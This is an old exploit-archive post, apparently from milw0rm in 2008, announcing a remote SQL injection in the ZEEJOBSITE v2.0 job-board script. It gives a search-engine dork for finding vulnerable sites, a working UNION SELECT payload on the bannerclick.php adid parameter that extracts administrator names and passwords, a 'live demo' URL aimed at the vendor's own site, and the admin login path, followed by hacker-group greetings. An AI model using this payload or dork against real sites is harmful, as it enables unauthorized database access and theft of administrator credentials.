|___________________________________________________| | | ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html | | DorK : inurl:employer_profile.php?compid= |___________________________________________________| Exploit: ________ www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- L!VE DEMO: _________ http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- ___________________ Admin LogiN : www.[target].com/Script/admin/ ____________________________( Greetz )____________________________ | | tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | | | jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke |_________________________________________________________________ Im IRAQi # milw0rm.com [2008-08-15]